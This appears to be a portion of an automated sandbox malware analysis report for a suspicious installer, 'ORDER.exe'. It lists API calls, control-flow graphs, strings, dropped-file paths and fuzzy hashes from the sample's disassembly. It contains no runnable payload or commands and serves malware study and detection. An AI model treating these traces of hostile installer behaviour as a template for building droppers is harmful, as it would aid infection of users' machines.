                          • "C:\Users\user\Desktop\ORDER.exe", xrefs: 004055F6
                          • \*.*, xrefs: 00405661
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405604
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                          • API String ID: 2035342205-3474549641
                          • Opcode ID: 82da6914721141c23c952b2a557d454053f92afbcbfffd72d9d73708a50b9132
                          • Instruction ID: a1a18f6d4a87cf364f513f4d5348cf8987bf6841df45d5f239a42b9e89fe31fb
                          • Opcode Fuzzy Hash: 82da6914721141c23c952b2a557d454053f92afbcbfffd72d9d73708a50b9132
                          • Instruction Fuzzy Hash: 8051D230905A04FADB216B618C89BBF7AB8DF42714F54803BF445721D2D73C4942EE6E
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                          • Instruction ID: 49e2905b870d629617cd54a3ad4ea64d750052a334705c7e6b68d35cedeefd19
                          • Opcode Fuzzy Hash: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                          • Instruction Fuzzy Hash: 28F17970D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D3785A96CF45
                          APIs
                          • CoCreateInstance.OLE32(00407384,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040208B
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407374,?,?), ref: 00402143
                          Strings
                          • C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike, xrefs: 004020CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike
                          • API String ID: 123533781-4182428349
                          • Opcode ID: 6766bdf138d9a3476f59e6ec973922d24ccafdcf77b7cead4b35a4f15cd1a772
                          • Instruction ID: 1053df79af30500630abfeafbcf843dcec04d0d4e3091bc204b5fde3a4f6985c
                          • Opcode Fuzzy Hash: 6766bdf138d9a3476f59e6ec973922d24ccafdcf77b7cead4b35a4f15cd1a772
                          • Instruction Fuzzy Hash: 3B416D71A00209BFCB40EFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                          APIs
                          • FindFirstFileA.KERNELBASE(?,00421548,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,004058F7,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0), ref: 00406045
                          • FindClose.KERNEL32(00000000), ref: 00406051
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp, xrefs: 0040603A
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp
                          • API String ID: 2295610775-1753671414
                          • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                          • Instruction ID: ffb9975cce6792308ede9dbdbab0a2e32819aea082b360212a672f9e7c6ece7a
                          • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                          • Instruction Fuzzy Hash: 7BD012319490306BC3106B787C0C85B7A599F573317118A33B56AF12F0C7389C7286ED
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                          • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                          • Instruction ID: 2c1b19e4de550b622e70843c6ca25527790cfa0381149662c4593fbace01eca7
                          • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                          • Instruction Fuzzy Hash: 00E0C232A04211ABC321AB749D48D3B73ACAFD8751309493EF50AF6150D734AC21EBBA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 403b19-403b2b 170 403b31-403b37 169->170 171 403c6c-403c7b 169->171 170->171 172 403b3d-403b46 170->172 173 403cca-403cdf 171->173 174 403c7d-403cb8 GetDlgItem * 2 call 403fec KiUserCallbackDispatcher call 40140b 171->174 177 403b48-403b55 SetWindowPos 172->177 178 403b5b-403b5e 172->178 175 403ce1-403ce4 173->175 176 403d1f-403d24 call 404038 173->176 193 403cbd-403cc5 174->193 180 403ce6-403cf1 call 401389 175->180 181 403d17-403d19 175->181 191 403d29-403d44 176->191 177->178 183 403b60-403b72 ShowWindow 178->183 184 403b78-403b7e 178->184 180->181 202 403cf3-403d12 SendMessageA 180->202 181->176 190 403fb9 181->190 183->184 186 403b80-403b95 DestroyWindow 184->186 187 403b9a-403b9d 184->187 192 403f96-403f9c 186->192 194 403bb0-403bb6 187->194 195 403b9f-403bab SetWindowLongA 187->195 199 403fbb-403fc2 190->199 197 403d46-403d48 call 40140b 191->197 198 403d4d-403d53 191->198 192->190 203 403f9e-403fa4 192->203 193->173 200 403c59-403c67 call 404053 194->200 201 403bbc-403bcd GetDlgItem 194->201 195->199 197->198 205 403f77-403f90 DestroyWindow EndDialog 198->205 206 403d59-403d64 198->206 200->199 208 403bec-403bef 201->208 209 403bcf-403be6 SendMessageA IsWindowEnabled 201->209 202->199 203->190 211 403fa6-403faf ShowWindow 203->211 205->192 206->205 207 403d6a-403db7 call 405d58 call 403fec * 3 GetDlgItem 206->207 239 403dc1-403dfd ShowWindow KiUserCallbackDispatcher call 40400e EnableWindow 207->239 240 403db9-403dbe 207->240 213 403bf1-403bf2 208->213 214 403bf4-403bf7 208->214 209->190 209->208 211->190 217 403c22-403c27 call 403fc5 213->217 218 403c05-403c0a 214->218 219 403bf9-403bff 214->219 217->200 222 403c40-403c53 SendMessageA 218->222 224 403c0c-403c12 218->224 219->222 223 403c01-403c03 219->223 222->200 223->217 227 403c14-403c1a call 40140b 224->227 228 403c29-403c32 call 40140b 224->228 235 403c20 227->235 228->200 237 403c34-403c3e 228->237 235->217 237->235 243 403e02 239->243 244 403dff-403e00 239->244 240->239 245 403e04-403e32 GetSystemMenu EnableMenuItem SendMessageA 243->245 244->245 246 403e34-403e45 SendMessageA 245->246 247 403e47 245->247 248 403e4d-403e86 call 404021 call 405d36 lstrlenA call 405d58 SetWindowTextA call 401389 246->248 247->248 248->191 257 403e8c-403e8e 248->257 257->191 258 403e94-403e98 257->258 259 403eb7-403ecb DestroyWindow 258->259 260 403e9a-403ea0 258->260 259->192 261 403ed1-403efe CreateDialogParamA 259->261 260->190 262 403ea6-403eac 260->262 261->192 263 403f04-403f5b call 403fec GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 261->263 262->191 264 403eb2 262->264 263->190 269 403f5d-403f70 ShowWindow call 404038 263->269 264->190 271 403f75 269->271 271->192
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                          • ShowWindow.USER32(?), ref: 00403B72
                          • DestroyWindow.USER32 ref: 00403B86
                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                          • GetDlgItem.USER32(?,?), ref: 00403BC3
                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                          • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                          • GetDlgItem.USER32(?,?), ref: 00403C8C
                          • GetDlgItem.USER32(?,00000002), ref: 00403C96
                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403CB0
                          • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D01
                          • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                          • ShowWindow.USER32(00000000,?), ref: 00403DC8
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                          • EnableWindow.USER32(?,?), ref: 00403DF5
                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E0B
                          • EnableMenuItem.USER32(00000000), ref: 00403E12
                          • SendMessageA.USER32(?,?,00000000,?), ref: 00403E2A
                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                          • lstrlenA.KERNEL32(Stvkonsekvenserne115 Setup: Installing,?,Stvkonsekvenserne115 Setup: Installing,00422F00), ref: 00403E66
                          • SetWindowTextA.USER32(?,Stvkonsekvenserne115 Setup: Installing), ref: 00403E75
                          • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                          • String ID: Stvkonsekvenserne115 Setup: Installing
                          • API String ID: 3906175533-147676709
                          • Opcode ID: 0715b8fe610bdd71fae90ba33bb4a09e8b5ebb3c50d1a2f397537002d346961d
                          • Instruction ID: 1f8690e76de68066656ca8d54ad2d010e53819933bf2384d883f7e4ba9537b83
                          • Opcode Fuzzy Hash: 0715b8fe610bdd71fae90ba33bb4a09e8b5ebb3c50d1a2f397537002d346961d
                          • Instruction Fuzzy Hash: 17C1C071A04205BBDB21AF21ED48D2B7EBCFB44706F40443EF601B11E1C7799942AB6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 272 403787-40379f call 406061 275 4037a1-4037b1 call 405c94 272->275 276 4037b3-4037e4 call 405c1d 272->276 285 403807-403830 call 403a4c call 4058b4 275->285 281 4037e6-4037f7 call 405c1d 276->281 282 4037fc-403802 lstrcatA 276->282 281->282 282->285 290 403836-40383b 285->290 291 4038b7-4038bf call 4058b4 285->291 290->291 292 40383d-403861 call 405c1d 290->292 297 4038c1-4038c8 call 405d58 291->297 298 4038cd-4038f2 LoadImageA 291->298 292->291 299 403863-403865 292->299 297->298 301 403973-40397b call 40140b 298->301 302 4038f4-403924 RegisterClassA 298->302 303 403876-403882 lstrlenA 299->303 304 403867-403874 call 4057f1 299->304 313 403985-403990 call 403a4c 301->313 314 40397d-403980 301->314 305 403a42 302->305 306 40392a-40396e SystemParametersInfoA CreateWindowExA 302->306 310 403884-403892 lstrcmpiA 303->310 311 4038aa-4038b2 call 4057c6 call 405d36 303->311 304->303 308 403a44-403a4b 305->308 306->301 310->311 317 403894-40389e GetFileAttributesA 310->317 311->291 325 403996-4039b3 ShowWindow LoadLibraryA 313->325 326 403a19-403a1a call 4050f1 313->326 314->308 320 4038a0-4038a2 317->320 321 4038a4-4038a5 call 40580d 317->321 320->311 320->321 321->311 327 4039b5-4039ba LoadLibraryA 325->327 328 4039bc-4039ce GetClassInfoA 325->328 332 403a1f-403a21 326->332 327->328 330 4039d0-4039e0 GetClassInfoA RegisterClassA 328->330 331 4039e6-403a09 DialogBoxParamA call 40140b 328->331 330->331 338 403a0e-403a17 call 4036d7 331->338 333 403a23-403a29 332->333 334 403a3b-403a3d call 40140b 332->334 333->314 336 403a2f-403a36 call 40140b 333->336 334->305 336->314 338->308
                          APIs
                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                          • lstrcatA.KERNEL32(1033,Stvkonsekvenserne115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stvkonsekvenserne115 Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77233410,"C:\Users\user\Desktop\ORDER.exe",00000000), ref: 00403802
                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike,1033,Stvkonsekvenserne115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stvkonsekvenserne115 Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                          • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                          • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                          • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike), ref: 004038DE
                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                          • RegisterClassA.USER32(00422EA0), ref: 0040391B
                          • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403933
                          • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                          • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                          • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                          • RegisterClassA.USER32(00422EA0), ref: 004039E0
                          • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Stvkonsekvenserne115 Setup: Installing$_Nb
                          • API String ID: 914957316-2728863211
                          • Opcode ID: 4a258d8796fa34fddb02ec2619d55facefc74f4564d7f9f136a4b3ccd76ffb40
                          • Instruction ID: 361ceaa5e45529a70bb989737ed67fdedcb7c759bf8cf29c3cde223c60b7be46
                          • Opcode Fuzzy Hash: 4a258d8796fa34fddb02ec2619d55facefc74f4564d7f9f136a4b3ccd76ffb40
                          • Instruction Fuzzy Hash: E661E6B16442007EE720AF659D45F273E6CEB8475AF40407FF941B22E2D67C9D02DA6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 343 402c79-402cc7 GetTickCount GetModuleFileNameA call 4059c7 346 402cd3-402d01 call 405d36 call 40580d call 405d36 GetFileSize 343->346 347 402cc9-402cce 343->347 355 402df1-402dff call 402bda 346->355 356 402d07-402d1e 346->356 348 402f18-402f1c 347->348 362 402ed0-402ed5 355->362 363 402e05-402e08 355->363 358 402d20 356->358 359 402d22-402d2f call 4031b6 356->359 358->359 367 402d35-402d3b 359->367 368 402e8c-402e94 call 402bda 359->368 362->348 365 402e34-402e80 GlobalAlloc call 406141 call 4059f6 CreateFileA 363->365 366 402e0a-402e22 call 4031cc call 4031b6 363->366 392 402e82-402e87 365->392 393 402e96-402ec6 call 4031cc call 402f1f 365->393 366->362 395 402e28-402e2e 366->395 372 402dbb-402dbf 367->372 373 402d3d-402d55 call 405982 367->373 368->362 376 402dc1-402dc7 call 402bda 372->376 377 402dc8-402dce 372->377 373->377 388 402d57-402d5e 373->388 376->377 384 402dd0-402dde call 4060d3 377->384 385 402de1-402deb 377->385 384->385 385->355 385->356 388->377 394 402d60-402d67 388->394 392->348 403 402ecb-402ece 393->403 394->377 396 402d69-402d70 394->396 395->362 395->365 396->377 398 402d72-402d79 396->398 398->377 400 402d7b-402d9b 398->400 400->362 402 402da1-402da5 400->402 404 402da7-402dab 402->404 405 402dad-402db5 402->405 403->362 406 402ed7-402ee8 403->406 404->355 404->405 405->377 407 402db7-402db9 405->407 408 402ef0-402ef5 406->408 409 402eea 406->409 407->377 410 402ef6-402efc 408->410 409->408 410->410 411 402efe-402f16 call 405982 410->411 411->348
                          APIs
                          • GetTickCount.KERNEL32 ref: 00402C8D
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ORDER.exe,00000400), ref: 00402CA9
                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 004059CB
                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059ED
                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER.exe,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 00402CF2
                          • GlobalAlloc.KERNELBASE(?,00409130), ref: 00402E39
                          Strings
                          • C:\Users\user\Desktop\ORDER.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                          • Inst, xrefs: 00402D60
                          • "C:\Users\user\Desktop\ORDER.exe", xrefs: 00402C79
                          • Error launching installer, xrefs: 00402CC9
                          • soft, xrefs: 00402D69
                          • Null, xrefs: 00402D72
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                          • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ORDER.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-2783425879
                          • Opcode ID: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                          • Instruction ID: 2a27acbe37a486d3f9fadad6f2898e15cdcbef103c1943e89973ac3215dbffb0
                          • Opcode Fuzzy Hash: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                          • Instruction Fuzzy Hash: BC61C671A40205ABDF20AF64DE89B9A76B4EF00315F20413BF904B72D1D7BC9E418BAD
                          APIs
                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                          • GlobalAlloc.KERNELBASE(?,000014A4), ref: 10001B67
                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                          • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                          • GlobalFree.KERNEL32(?), ref: 10001CC4
                          • GlobalFree.KERNEL32(?), ref: 10001CC9
                          • GlobalFree.KERNEL32(?), ref: 10001CCE
                          • GlobalFree.KERNEL32(00000000), ref: 10001E76
                          • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: Global$Free$lstrcpy$Alloc
                          • String ID:
                          • API String ID: 4227406936-0
                          • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                          • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                          • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                          • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
